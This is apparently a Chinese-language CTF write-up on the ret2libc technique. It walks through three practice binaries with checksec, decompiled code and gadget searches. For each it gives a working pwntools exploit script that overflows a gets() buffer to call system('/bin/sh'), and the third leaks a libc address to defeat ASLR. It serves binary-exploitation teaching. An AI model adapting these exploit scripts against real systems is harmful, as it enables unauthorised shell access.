ret2libc
原理:ret2libc即控制函数执行libc中的函数,通常返回至某个函数的plt处或者函数的具体位置(即函数对应的got表项的内容)。一般情况下,我们会选择执行system("/bin/sh"),故而此时我们需要知道system函数的地址。
ret2libc1
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
查看程序源代码
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 1, 0);
puts("RET2LIBC >_<");
gets(&s);
return 0;
}
使用ROPgadget工具查找'/bin/sh'
root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc1 --string '/bin/sh'
Strings information
============================================================
0x08048720 : /bin/sh
在查找sys函数,看是否存在
.plt:08048460 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]
exp
from pwn import *
#by diaolan
io=process("./ret2libc1")
binsh_addr = 0x08048720
plt_sys_addr = 0x08048460
pd = flat(['a'*112,plt_sys_addr,'b'*4,binsh_addr])
io.sendline(pd)
io.interactive()
ret2libc2
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 1, 0);
puts("Something surprise here, but I don't think it will work.");
printf("What do you think ?");
gets(&s);
return 0;
}
pwndbg> cyclic -l caab
108
.plt:08048490 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]
root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc2 --string '/bin/sh'
Strings information
============================================================
找不到/bin/sh
root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc2 --only 'pop|ret'
Gadgets information
============================================================
0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1
exp如下
from pwn import *
#by diaolan
sh=process("./ret2libc2")
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
pd = flat(['a'*112,gets_plt,pop_ebx,buf2,system_plt,'b'*4,buf2])
sh.sendline(pd)
sh.sendline('/bin/sh')
sh.interactive()
ret2libc3
root@moli-virtual-machine:~/文档/ret2libc# checksec ret2libc3
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
puts("No surprise anymore, system disappeard QQ.");
printf("Can you find it !?");
gets(&s);
return 0;
}
pwndbg> cyclic -l caab
108
root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc3 --string '/bin/sh'
Strings information
============================================================
既没有/bin/sh,也没有sys
知识点
- sys函数属于libc,而libc.so动态链接库中的函数之间的相对偏移是固定的
- 即使程序开启了ASLR保护,也只是针对地址中间位进行随机,最低的12位不会发生变化
- 如果我们知道libc某个函数的地址,那么我们就可以确定该程序利用的libc,进而我们就可以知道sys函数的地址
- 由于got表的延迟绑定机制,我们需要泄露已经执行过的函数的地址
- 在得到libc后,libc中也有binsh,我们可以直接得到binsh的地址
操作步骤
- 泄露_libc_start_main地址
- 获取libc版本
- 获取sys地址与/bin/sh地址
- 再次执行源程序
- 触发system('/bin/sh')
exp如下
from pwn import *
from LibcSearcher import *
#by diaolan
sh = process('./ret2libc3')
ret2libc3 = ELF('./ret2libc3')
puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']
payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])
sh.sendlineafter('Can you find it !?', payload)
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])
sh.sendline(payload)
sh.interactive()